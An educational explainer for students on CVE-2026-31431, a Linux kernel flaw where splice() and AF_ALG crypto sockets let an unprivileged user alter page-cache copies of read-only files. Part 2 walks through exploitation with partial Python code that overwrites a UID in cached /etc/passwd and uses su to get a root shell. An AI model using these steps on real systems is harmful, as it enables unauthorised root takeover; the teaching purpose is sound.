CVE-2026-31431: Simplified Explanation for CS Students

Introduction

CVE-2026-31431 is a critical Linux kernel vulnerability that shows how unrelated system features can combine into a serious security flaw. It allows any regular user to escalate privileges to root by exploiting a flaw in how the kernel handles page-cache pages that are passed to cryptographic sockets.

What makes this vulnerability particularly educational is that it involves fundamental operating system concepts that every computer science student should understand: file permissions, memory management, system calls, and the kernel's trust model. The exploit chain is elegant in its simplicity, requiring just a few lines of code to completely compromise system security.

Here is my understanding of how this vulnerability works and what actually happens in the kernel during exploitation: a simple explanation of what I learned.

Part 1: The Vulnerability (What's Broken?)

Background: What is a Page Cache?

When your program reads a file from disk, the kernel stores a copy in RAM. Next time you read the same file, it comes from RAM (fast) instead of disk (slow). This copy in RAM is called the page cache.

First read: Disk → RAM (page cache) → Your program
Second read: RAM (page cache) → Your program (much faster!)
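
A rough way to see the page cache at work is to time two consecutive reads of the same file. The sketch below is illustrative only: the helper name time_two_reads is hypothetical, the posix_fadvise eviction hint is advisory and not available on every platform, and timings vary a lot between machines, so no particular speedup is guaranteed.

```python
import os
import tempfile
import time


def time_two_reads(path):
    """Return (first_seconds, second_seconds, same_data) for two reads of path."""
    # Ask the kernel to drop cached pages for this file so the first read is
    # more likely to hit the disk. This is only a hint, hence the guards.
    if hasattr(os, "posix_fadvise"):
        fd = os.open(path, os.O_RDONLY)
        try:
            os.posix_fadvise(fd, 0, 0, os.POSIX_FADV_DONTNEED)
        except OSError:
            pass  # some filesystems reject the hint; the demo still works
        finally:
            os.close(fd)

    timings = []
    contents = []
    for _ in range(2):
        start = time.perf_counter()
        with open(path, "rb") as f:
            contents.append(f.read())
        timings.append(time.perf_counter() - start)
    return timings[0], timings[1], contents[0] == contents[1]


if __name__ == "__main__":
    # Hypothetical demo file; any large regular file would do.
    with tempfile.NamedTemporaryFile(delete=False) as tmp:
        tmp.write(os.urandom(8 * 1024 * 1024))
        tmp.flush()
        os.fsync(tmp.fileno())  # clean pages can be evicted, dirty ones cannot
    try:
        first, second, same = time_two_reads(tmp.name)
        print(f"first read:  {first:.6f}s")
        print(f"second read: {second:.6f}s")
        print("identical data:", same)
    finally:
        os.unlink(tmp.name)
```

Both reads return the same bytes; only the source (disk or RAM) differs, which is why the cached copy is effectively "the file" for every process on the system.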

The Problem in Simple Terms

Normally, the kernel protects data:

If you have read permission on a file → you can read it
If you don't have write permission on a file → you can't modify it

The bug: The kernel allows a non-root user to modify the page-cache copy of /etc/passwd (a protected file) because:

/etc/passwd is world-readable (everyone can read it)
The kernel assumes: "If you can read the file, we can safely process its cache pages"
BUT the kernel doesn't check if you should be allowed to write to those pages
Result: You can modify the cached copy without actually having write permission

Why This Happens

The vulnerability is in the algif_aead (cryptographic socket) code:

What's a Cryptographic Socket? AF_ALG (the "algorithm" address family) sockets let user programs access kernel crypto functions (encryption, hashing, etc.) through the ordinary socket API. When combined with zero-copy calls such as splice(), the input does not have to be copied through user space. Think of it as a "crypto accelerator" that works directly on kernel memory.
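
For a feel of what ordinary AF_ALG use looks like, here is a minimal sketch that asks the kernel to compute a SHA-256 digest and compares it with hashlib. It uses the hash interface, not the aead interface discussed in this article, and it does not touch the page cache. The helper name kernel_sha256 is hypothetical, and the function returns None where AF_ALG is unavailable (non-Linux systems, or kernels and sandboxes that disable it).

```python
import hashlib
import socket


def kernel_sha256(data):
    """Hash data with the kernel's SHA-256 via AF_ALG, or return None."""
    if not hasattr(socket, "AF_ALG"):
        return None  # Python build or OS without AF_ALG support
    try:
        with socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0) as alg:
            alg.bind(("hash", "sha256"))  # (algorithm type, algorithm name)
            op, _ = alg.accept()          # per-operation socket
            with op:
                op.sendall(data)
                return op.recv(32)        # SHA-256 digests are 32 bytes
    except OSError:
        return None  # AF_ALG blocked or algorithm not available


digest = kernel_sha256(b"hello")
if digest is None:
    print("AF_ALG not available here")
else:
    print(digest.hex())
    print("matches hashlib:", digest == hashlib.sha256(b"hello").digest())
```

Here the data is sent from a user-space buffer, so the kernel works on its own copy. The vulnerability described below concerns the case where the input pages come straight from the page cache instead.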

Normal expectation:

User has read access to /etc/passwd
→ Kernel can use it as INPUT to crypto operation
→ User gets the OUTPUT

The bug (wrong):

User has read access to /etc/passwd
→ Kernel uses it as both INPUT AND OUTPUT to crypto operation
→ Kernel writes back to the same page-cache page
→ User can modify a page they should only be able to read!

Code Example: What the Bug Allows

# Without the bug:
os.read(fd, 4096)  # ✓ Allowed: reading /etc/passwd
os.write(fd, b"hack")  # ✗ Blocked: not allowed to write

# With the bug:
# A cryptographic operation can modify the page-cache
# of /etc/passwd even though we only have read access
splice(fd_passwd, pipe) → AF_ALG_socket
# AF_ALG socket writes back to the page-cache page
# This SHOULD be blocked but ISN'T (the bug!)
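
The "without the bug" half of the example can be run safely against a throwaway file. This sketch shows the kernel rejecting a write on a descriptor that was opened read-only. The helper name try_write_readonly is an assumption, and it deliberately uses a temporary file rather than /etc/passwd.

```python
import errno
import os
import tempfile


def try_write_readonly(path):
    """Open path read-only, attempt a write, and return the errno (or None)."""
    fd = os.open(path, os.O_RDONLY)
    try:
        os.read(fd, 4096)          # reading is allowed
        os.write(fd, b"hack")      # writing through a read-only fd is not
    except OSError as exc:
        return exc.errno
    finally:
        os.close(fd)
    return None


with tempfile.NamedTemporaryFile(delete=False) as tmp:
    tmp.write(b"student:x:1000:1000::/home/student:/bin/bash\n")
try:
    err = try_write_readonly(tmp.name)
    print(errno.errorcode.get(err))   # EBADF on Linux
    with open(tmp.name, "rb") as f:
        print(f.read())               # file content is unchanged
finally:
    os.unlink(tmp.name)
```

This is the check that the normal write path enforces and that the vulnerable in-place crypto path sidesteps.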

Part 2: The Exploitation (How to Exploit It?)

Target: Modify Your UID to 0 (Root)

The file /etc/passwd looks like this:

username:x:UID:GID:comment:home:shell
student:x:1000:1000:Student User:/home/student:/bin/bash
          ↑
      This UID number

Attack goal: Change the UID field from 1000 to 0000 in the page-cache copy. The field keeps its four-character width, and 0000 parses as UID 0, which is root.
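
To make the field layout concrete, here is a small parser for one /etc/passwd line. It is a sketch, not the C library's implementation: the PasswdEntry class and parse_passwd_line function are hypothetical names, and Python's int() stands in for whatever numeric parsing the real lookup code performs.

```python
from dataclasses import dataclass


@dataclass
class PasswdEntry:
    name: str
    password: str
    uid: int
    gid: int
    comment: str
    home: str
    shell: str


def parse_passwd_line(line):
    """Split one /etc/passwd line into its seven colon-separated fields."""
    name, password, uid, gid, comment, home, shell = line.rstrip("\n").split(":")
    return PasswdEntry(name, password, int(uid), int(gid), comment, home, shell)


original = parse_passwd_line("student:x:1000:1000:Student User:/home/student:/bin/bash")
modified = parse_passwd_line("student:x:0000:1000:Student User:/home/student:/bin/bash")
print(original.uid)  # 1000
print(modified.uid)  # 0
```

Only four bytes differ between the two lines, yet the second one describes an account with root's UID.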

Step-by-Step Exploitation

Step 1: Load /etc/passwd into Page Cache

# Force the file into RAM cache
fd = os.open("/etc/passwd", os.O_RDONLY)
os.read(fd, 4096)  # Read up to 4096 bytes (one 4 KB page), not necessarily the whole file
# Now /etc/passwd is in the kernel's page cache

Step 2: Create a Cryptographic Socket

# Create an AF_ALG socket for encryption/decryption
master = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)
master.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
# This socket can modify page-cache pages (the vulnerability!)

Step 3: Use Splice to Feed the Cached Page Into the Socket

What's Splice? splice() is a system call that moves data between two file descriptors, one of which must be a pipe, without copying it through user space. It is a "zero-copy" operation that passes references to kernel memory pages instead of duplicating their contents. Normally this is great for performance, but here it lets us feed page-cache pages directly into the crypto socket.

# Splice moves data WITHOUT copying to user space
# This is key: it lets us feed kernel memory pages directly

# Read from /etc/passwd at the UID field offset
n = os.splice(fd_passwd, pipe, 32, offset_src=uid_offset)

# Write that data into the AF_ALG socket
# The socket will process it IN-PLACE (modify the page!)
n = os.splice(pipe, af_alg_socket.fileno(), n)

What happens inside the kernel:

/etc/passwd page in RAM:
[... username:x:1000:1000:... ]
                    ↑
                  This byte is in the page-cache

AF_ALG socket reads and writes to the SAME page:
Input:  Read 32 bytes starting at uid_offset
Output: Write results back to the SAME location
        (This is the bug! It shouldn't be allowed!)

Step 4: The Kernel's Scratch-Write (The Actual Corruption)

# We control the AAD (Additional Authenticated Data)
# The kernel copies bytes from AAD to the destination page
aad = b"\x00\x00\x00\x00" + b"0000"  # SPI + seqno_lo
#     ←4 zero bytes→     ←"0000"→
#     (SPI field)        (our payload: new UID)
#
# Why hex \x00? These are null bytes (value 0) required by the crypto protocol
# The "0000" is our actual payload - the UID we want to write to /etc/passwd

# When AF_ALG processes the request, it writes:
# destination_page[offset] = aad[4:8]  # "0000"
# This overwrites the UID field!

Step 5: Verify the Corruption

# Read /etc/passwd again from page cache
with open("/etc/passwd", "rb") as f:
    f.seek(uid_offset)
    uid_bytes = f.read(4)

print(uid_bytes)  # Output: b"0000"  ✓ Corruption successful!

Step 6: Exploit with su Command

# Now the page-cache says you're UID 0 (root)
# But /etc/shadow (password file) is unchanged

su student
# Enter your own password
# PAM checks password against /etc/shadow → ✓ CORRECT
# PAM checks UID in /etc/passwd → 0000 (root)
# su calls setuid(0), and the kernel accepts it → SUCCESS!
# You now have a root shell!

Why This Works: The Permission Model Inversion

Normal File Permission Model:

File: /etc/passwd
Permissions: -rw-r--r--  (world-readable)

What a user can do:
✓ Read the file content
✗ Write to the file
✗ Modify the file
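
The permission string above can be inspected programmatically. The sketch below applies the same 0644 mode to a temporary file and decodes it; describe_permissions is a hypothetical helper, and a temporary file is used so that nothing on the real system is touched.

```python
import os
import stat
import tempfile


def describe_permissions(path):
    """Return (mode_string, others_can_read, others_can_write) for path."""
    mode = os.stat(path).st_mode
    return (
        stat.filemode(mode),
        bool(mode & stat.S_IROTH),
        bool(mode & stat.S_IWOTH),
    )


with tempfile.NamedTemporaryFile(delete=False) as tmp:
    pass
try:
    os.chmod(tmp.name, 0o644)  # same mode as the /etc/passwd listing above
    print(describe_permissions(tmp.name))  # ('-rw-r--r--', True, False)
finally:
    os.unlink(tmp.name)
```

The last flag is the important one: users outside the owner get read access but no write access, and that is the boundary this bug crosses.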

With This Bug:

User → Read /etc/passwd (allowed)
     → Load into page cache
     → Use splice() to feed page-cache into crypto socket
     → Kernel modifies the page-cache page
     → User can now read modified content!

Result: User can EFFECTIVELY WRITE to /etc/passwd
        without having write permissions!

Code Flow Diagram

User (UID 1000)
    ↓
[1] os.open("/etc/passwd", read-only)  ✓ Allowed
    ↓
[2] os.read(4096 bytes)  ✓ Allowed (world-readable)
    Page-cache now has /etc/passwd
    ↓
[3] Create AF_ALG socket
    ↓
[4] splice(fd_passwd → AF_ALG_socket)
    ↓
[5] Kernel's AF_ALG code (BUG HERE!):
    "We have page-cache pages from a readable file
     Let's do crypto operations on them in-place"

    ✗ BUG: Doesn't check if user should WRITE to the page!
    ✓ Only checks: can user READ the file? (yes)

    Page-cache /etc/passwd gets modified:
    "1000" → "0000"
    ↓
[6] getpwnam("student") reads from page-cache
    Returns: UID = 0000 (corrupted!)
    ↓
[7] su student
    ↓
[8] Password check (against /etc/shadow) → CORRECT ✓
    ↓
[9] setuid(0)  ← Uses corrupted UID from page-cache
    ↓
[10] Root shell obtained! 🎯

Key Insight: Why Splice Makes It Possible

Without Splice (Safe):

/etc/passwd (disk)
    ↓
User space buffer ← data COPIED here
    ↓
AF_ALG socket processes it
    ↓
User gets output
    ↓
Kernel never modifies the actual page-cache

With Splice (Vulnerable):

/etc/passwd (page-cache RAM)
    ↓
AF_ALG socket gets DIRECT ACCESS to the page
    ↓
No private copy exists: the in-place operation reads AND writes the same page!
    ↓
Page-cache /etc/passwd is modified in-place
    ↓
This page is the "truth" for all file reads!
    ↓
Next read of /etc/passwd gets corrupted data
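
The difference between the two flows can be modelled entirely in user space. This toy sketch uses a bytearray as a stand-in for one cached page; it involves no kernel interfaces, and the function names process_with_copy and process_in_place are made up for illustration.

```python
def process_with_copy(cache, offset, new_bytes):
    """Work on a private copy, as a read() into a user buffer would."""
    private = bytearray(cache)          # copy: the cache is untouched
    private[offset:offset + len(new_bytes)] = new_bytes
    return bytes(private)


def process_in_place(cache, offset, new_bytes):
    """Work directly on the shared buffer, as the buggy path effectively does."""
    view = memoryview(cache)            # no copy: same underlying memory
    view[offset:offset + len(new_bytes)] = new_bytes
    return bytes(cache)


line = b"student:x:1000:1000:Student User:/home/student:/bin/bash\n"
offset = line.index(b"1000")

page_cache = bytearray(line)            # toy stand-in for one cached page
process_with_copy(page_cache, offset, b"0000")
print(bytes(page_cache) == line)        # True: other readers see original data

process_in_place(page_cache, offset, b"0000")
print(bytes(page_cache) == line)        # False: every later reader sees the change
```

In the copy-based flow the modification is confined to the caller's private buffer. In the in-place flow the shared buffer itself changes, which mirrors why a write into a page-cache page is visible to every process that reads the file afterwards.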

Simplified Summary

The Vulnerability

One broken assumption in the kernel:

"If a user can READ a file, then page-cache pages of that file can be safely modified in-place during cryptographic operations"

This assumption is wrong because:

Splice can feed those pages directly to output buffers
Users can modify page-cache without write permission
Page-cache corruption = file corruption (for all users!)

The Exploitation

Load /etc/passwd into page-cache (read-only is fine)
Use splice + AF_ALG socket to write to the page-cache
Modify UID field: 1000 → 0000
Call su with correct password
PAM validates password ✓ and UID = 0 from corrupted cache ✓
setuid(0) executed → root shell

Total attack time: ~5 seconds

Security takeaway: A single kernel bug in an obscure subsystem (AF_ALG) + a legitimate optimization (splice) = complete system compromise.

Conclusion

This vulnerability teaches us:

Page cache is critical infrastructure → must be protected
Zero-copy is powerful but dangerous → requires careful security design
Permission boundaries must be enforced at all layers → even in kernel
Combining features is risky → splice and AF_ALG were never meant to work together this way

Understanding vulnerabilities like CVE-2026-31431 helps us appreciate the complexity of operating system security and the importance of thorough security reviews when combining system features.

References & Learning Resources

Official Vulnerability Records

CVE-2026-31431 Official Record: CVE MITRE Database
National Vulnerability Database: NVD Details

Technical Analysis

Copy Fail Vulnerability Research: https://copy.fail/ - Comprehensive technical analysis of this specific vulnerability. Notable for being a straight-line logic flaw that doesn't require race conditions or kernel-specific offsets. The same 732-byte Python script can root every Linux distribution shipped since 2017.

Security Monitoring

CISA Known Exploited Vulnerabilities: CISA KEV Catalog